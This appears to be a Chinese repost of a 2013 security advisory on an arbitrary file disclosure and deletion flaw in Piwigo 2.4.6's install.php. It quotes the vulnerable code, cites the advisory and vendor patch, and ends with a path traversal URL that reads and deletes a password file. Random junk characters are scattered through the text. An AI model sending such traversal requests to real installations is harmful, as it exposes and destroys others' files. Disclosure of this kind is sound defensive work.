Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

  a$ i9 }  I% s# M* @3 [Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
  F, P+ ~8 ?. k3 U0 z====================================================================
0 ^) X/ {& g" }+ k' U9 O) [2 ~/install.php:
-------------
( e( r2 C" n# s; z113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
6 ]& ~5 a! A5 z8 \1 `6 s7 D5 T116:   header('Cache-Control: no-cache, must-revalidate');
- X% p# N- b6 c' g% d$ Q8 O117:   header('Pragma: no-cache');
1 _% e% z$ }% c, e$ ]$ f4 g118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
; g3 |( q( M; D, Z  ^% T% k! I120:   header('Content-Length: '.filesize($filename));
& C( @9 U' y- T$ x7 e% d# o121:   echo file_get_contents($filename);
122:   unlink($filename);
  s. x# \/ D7 C* I# Z123:   exit();
* N# n- p( Y. v- V0 R124: }
3 W( s* `6 i) C: l& M% u7 {) }====================================================================

7 k1 Y2 c  q1 M' p) y$ g* XTested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

; ^. {) ?; z9 \1 ~Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

  Y$ Q, x; Z* U* CAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
9 J  n0 P/ F7 Y: |Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

+ L& @7 V/ ~3 N( J( Z  p, u" {! I& ]* I15.02.2013

--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
- ^4 m9 {7 b7 M1 c3 O